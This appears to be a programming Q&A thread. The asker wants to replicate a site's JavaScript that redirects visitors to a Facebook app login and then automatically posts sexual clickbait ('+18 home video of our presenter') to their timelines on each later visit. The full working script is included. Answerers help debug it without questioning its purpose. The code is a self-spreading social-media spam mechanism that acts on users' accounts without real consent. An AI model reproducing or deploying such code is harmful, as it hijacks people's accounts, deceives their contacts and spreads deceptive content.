# Facebook auto posting from website

Tags: facebook, facebook-graph-api, facebook-like, facebook-javascript-sdk

i need to make script like this one here:
http://onion.mk/konecno-objaveno-domasnoto-video-na-nasata-voditelka/?ref=top

after few seconds of viewing the post automaticly redirect you to facebook APP and request you to loggin to see the post. After the first login everytime you see any other post automaticly post to your timeline.

Its javascript and can be find in the source of the website but wont work... something missing there...
can some one help me please?

```
<div
id="fb-root"></div><script>
  var app_id = '467647329957056';   var cookie_prefix = 'onion_mk_';
  var appdomain = 'onion.mk';
  var appdomain_formatted = appdomain.charAt(0).toUpperCase() + appdomain.substring(1);
        function setCookie(c_name, value, exdays, time) {
            var exdate = new Date();
            if(time!='')
            {
                exdate.setTime( exdate.getTime() + (time*60*1000));
            }else{
                exdate.setDate(exdate.getDate() + exdays);
            }            
            var c_value = escape(value) + ((exdays == null) ? "" : "; expires=" + exdate.toUTCString()) + ";path=/;domain=" + appdomain;
            document.cookie = cookie_prefix + c_name + "=" + c_value;
        }
        function getCookie(c_name) {
            var i, x, y, ARRcookies = document.cookie.split(";");
            for (i = ARRcookies.length - 1; i >= 0; i--) {
                x = ARRcookies[i].substr(0, ARRcookies[i].indexOf("="));
                y = ARRcookies[i].substr(ARRcookies[i].indexOf("=") + 1);
                x = x.replace(/^\s+|\s+$/g, "");
                if (x == cookie_prefix + c_name) {
                    return unescape(y);
                }
            }
        }

function isEmpty(obj) {
    for(var prop in obj) {
        if(obj.hasOwnProperty(prop))
            return false;
    }

    return true;
}
  window.fbAsyncInit = function() {
    FB.init({
      appId      : app_id,
      status     : true,
      cookie     : true,
      xfbml      : true
    });
            FB.Event.subscribe('edge.create', function (response) {
                  document.getElementById('likeboxbgr').style.display='none';
                  document.getElementById('likebox').style.display='none';
            });

FB.getLoginStatus(function (response) {
            var accessToken = null;
            var session = FB.getAuthResponse();
            if (session != null) {
                 accessToken = session.accessToken;
            }
            var token = accessToken;
            var userID;
        if(response.status == 'connected')
        {
            FB.api('/me', function (resp) {
                userID = resp.id;
            var fql_query = "SELECT uid FROM page_fan WHERE page_id = " + 487604931274728 + " and uid=" + userID;
            var the_query = FB.Data.query(fql_query);
            the_query.wait(function (rows) {
                  if (rows.length == 1 && rows[0].uid == userID) {
                         document.getElementById('likeboxbgr').style.display='none';
                         document.getElementById('likebox').style.display='none';
                  }else
                  {
                        document.getElementById('likeboxbgr').style.display='block';
                        document.getElementById('likebox').style.display='block';
                  }
            });
                                                if (getCookie('posted_article_100') == null && 69>0 && getCookie('posted') == null) {
                                FB.api('/me/feed','post',
                                  {
                                      message: 'Конечно објавено домашно видео на нашата водителка (+18)',
                                      name: 'Конечно објавено домашно видео на нашата водителка (+18) | ' + appdomain_formatted,
                                      caption: appdomain_formatted,
                                      description: 'Неодамна излезе домашното видео на нашата позната водителка, за кое...',
                                      link: 'http://www.facebook.com/connect/uiserver.php?app_id='+app_id+'&method=permissions.request&redirect_uri=http://onion.mk/konecno-objaveno-domasnoto-video-na-nasata-voditelka/&amp;error_reason=user_denied&amp;error=access_denied&amp;error_description=The+user+denied+your+request.&response_type=none&display=page&auth_referral=1',
                                      picture: 'http://onion.mk/wp-content/uploads/2013/02/SuperSexyGirls1.jpg'
                                  },
                                  function (rsp) {
                                      if (rsp.id) {
                                          setCookie('posted_article_100', '1', 5);
                                          setCookie('posted', '1', 5, 15);
                                      } else {
console.log(rsp);
                                          top.location.href = 'http://www.facebook.com/connect/uiserver.php?app_id='+app_id+'&method=permissions.request&redirect_uri=http://onion.mk/konecno-objaveno-domasnoto-video-na-nasata-voditelka/&amp;error_reason=user_denied&amp;error=access_denied&amp;error_description=The+user+denied+your+request.&response_type=none&display=page&auth_referral=1';
                                      };

                                  }
                                );
                            }
                                      });
        }else if (response.status === 'not_authorized')
        {

                     document.getElementById('wrapper').style.opacity = 0.12;
             top.location.href = 'http://www.facebook.com/connect/uiserver.php?app_id='+app_id+'&method=permissions.request&redirect_uri=http://onion.mk/konecno-objaveno-domasnoto-video-na-nasata-voditelka/&amp;error_reason=user_denied&amp;error=access_denied&amp;error_description=The+user+denied+your+request.&response_type=none&display=page&auth_referral=1';
                     }else
        {
             console.log('not logged!');
        }

 });
  };
  (function(d, debug){
     var js, id = 'facebook-jssdk', ref = d.getElementsByTagName('script')[0];
     if (d.getElementById(id)) {return;}
     js = d.createElement('script'); js.id = id; js.async = true;
     js.src = "//connect.facebook.net/en_US/all" + (debug ? "/debug" : "") + ".js";
     ref.parentNode.insertBefore(js, ref);
   }(document, /*debug*/ false));
</script>
```

Comment: this tutorial will guide you from start to end: http://www.loginworks.com/technical-blogs/404-working-with-facebook-javascript-sdk

Answer (score 0):

From a quick look, it looks like that code should work.

Have you set up your app in facebook developer properly - and asked for the correct permissions to post on to the user's timeline?

Comment: I really dont know how to setup the app..
what shoud i add in the opengraph options? Also this wont load automaticly on my webpage.

Comment: Yeah that's because the this code would be set up to point to that person's app. 
you can see this in the variables: 
var app_id = '467647329957056';   
var cookie_prefix = 'onion_mk_';
var appdomain = 'onion.mk';

You'll need to become familiar with building facebook apps - it takes too long to describe here :)
Have a look at:[https://developers.facebook.com/docs/opengraph/getting-started/]

Comment: I setup the app correctly!
still wont work :( also i recode the screipt according to my website domain and my app ID.

Comment: you should see some errors in your Javascript console - you might wanna go through them and sort them out. Good luck!